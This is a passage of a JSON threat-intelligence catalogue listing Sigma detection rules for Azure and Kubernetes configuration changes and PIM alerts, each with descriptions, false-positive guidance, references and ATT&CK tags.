"azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml" ], "tags": [ "attack.persistence", "attack.t1078", "attack.credential-access", "attack.t1552", "attack.t1552.007" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "value": "Azure Kubernetes Admission Controller" }, { "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", "value": "Azure Firewall Rule Collection Modified or Deleted" }, { "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", "value": "Azure Point-to-site VPN Modified or Deleted" }, { "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_network_policy_change.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml" ], "tags": [ "attack.impact", "attack.credential-access" ] }, "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", "value": "Azure Kubernetes Network Policy Change" }, { "description": "Identifies when a application security group is modified or deleted.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "Application security group being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_application_security_group_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", "value": "Azure Application Security Group Modified or Deleted" }, { "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "Suppression Rule being created may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_suppression_rule_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml" ], "tags": [ "attack.impact" ] }, "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", "value": "Azure Suppression Rule Created" }, { "description": "Identifies when a new cloudshell is created inside of Azure portal.", "meta": { "author": "Austin Songer", "creation_date": "2021-09-21", "falsepositive": [ "A new cloudshell may be created by a system administrator." ], "filename": "azure_new_cloudshell_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", "value": "Azure New CloudShell Created" }, { "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access" ] }, "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" }, { "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "Key being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_keyvault_key_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access", "attack.t1552", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80eeab92-0979-4152-942d-96749e11df40", "value": "Azure Keyvault Key Modified or Deleted" }, { "description": "Identifies when a key vault is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "Key Vault being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_keyvault_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access", "attack.t1552", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", "value": "Azure Key Vault Modified or Deleted" }, { "description": "Identifies when a Firewall Policy is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-02", "falsepositive": [ "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_network_firewall_policy_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1562.007" ] }, "related": [ { "dest-uuid": "77532a55-c283-4cd2-bc5d-2d0b65e9d88c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", "value": "Azure Network Firewall Policy Modified or Deleted" }, { "description": "Identifies when a service account is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "value": "Azure Kubernetes Service Account Modified or Deleted" }, { "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_cluster_created_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", "value": "Azure Kubernetes Cluster Created or Deleted" }, { "description": "Identifies when a application gateway is modified or deleted.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "Application gateway being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_application_gateway_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", "value": "Azure Application Gateway Modified or Deleted" }, { "description": "Identifies when DNS zone is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_dns_zone_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af6925b0-8826-47f1-9324-337507a0babd", "value": "Azure DNS Zone Modified or Deleted" }, { "description": "Identifies when a application credential is modified.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-02", "falsepositive": [ "Application credential added may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_app_credential_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_app_credential_modification.yml" ], "tags": [ "attack.impact" ] }, "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", "value": "Azure Application Credential Modified" }, { "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", "meta": { "author": "sawwinnnaung", "creation_date": "2020-05-07", "falsepositive": [ "Valid change" ], "filename": "azure_creating_number_of_resources_detection.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", "value": "Number Of Resource Creation Or Deployment Activities" }, { "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Legitimate AAD Health AD FS service instances being deleted in a tenant" ], "filename": "azure_aadhybridhealth_adfs_service_delete.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml" ], "tags": [ "attack.defense-evasion", "attack.t1578.003" ] }, "related": [ { "dest-uuid": "70857657-bd0b-4695-ad3e-b13f92cac1b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", "value": "Azure Active Directory Hybrid Health AD FS Service Delete" }, { "description": "Identifies when a firewall is created, modified, or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_firewall_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", "value": "Azure Firewall Modified or Deleted" }, { "description": "Identifies when a device in azure is no longer managed or compliant", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Administrator may have forgotten to review the device." ], "filename": "azure_device_no_longer_managed_or_compliant.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml" ], "tags": [ "attack.impact" ] }, "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", "value": "Azure Device No Longer Managed or Compliant" }, { "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_network_virtual_device_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", "value": "Azure Virtual Network Device Modified or Deleted" }, { "description": "Identifies when a network security configuration is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_network_security_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", "value": "Azure Network Security Configuration Modified or Deleted" }, { "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-22", "falsepositive": [ "Azure Kubernetes CronJob/Job may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_cronjob.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml" ], "tags": [ "attack.persistence", "attack.t1053.003", "attack.privilege-escalation", "attack.execution" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "value": "Azure Kubernetes CronJob" }, { "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_events_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", "value": "Azure Kubernetes Events Deleted" }, { "description": "Identifies when an account hasn't signed in during the past n number of days.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if potential generic account that cannot be removed." ], "filename": "azure_pim_account_stale.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e402c26a-267a-45bd-9615-bd9ceda6da85", "value": "Stale Accounts In A Privileged Role" }, { "description": "Identifies when an organization doesn't have the proper license for PIM and is out of compliance.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if licenses have expired." ], "filename": "azure_pim_invalid_license.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58af08eb-f9e1-43c8-9805-3ad9b0482bd8", "value": "Invalid PIM License" }, { "description": "Identifies when a privilege role can be activated without performing mfa.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if user is performing MFA at sign-in." ], "filename": "azure_pim_role_no_mfa_required.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "94a66f46-5b64-46ce-80b2-75dcbe627cc0", "value": "Roles Activation Doesn't Require MFA" }, { "description": "Identifies when a user has been assigned a privilege role and are not using that role.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if potential generic account that cannot be removed." ], "filename": "azure_pim_role_not_used.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c6ec464-4ae4-43ac-936a-291da66ed13d", "value": "Roles Are Not Being Used" }, { "description": "Identifies an event where there are there are too many accounts assigned the Global Administrator role.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate if threshold setting in PIM is too low." ], "filename": "azure_pim_too_many_global_admins.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7bbc309f-e2b1-4eb1-8369-131a367d67d3", "value": "Too Many Global Admins" }, { "description": "Identifies when the same privilege role has multiple activations by the same user.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-14", "falsepositive": [ "Investigate where if active time period for a role is set too short." ], "filename": "azure_pim_role_frequent_activation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ 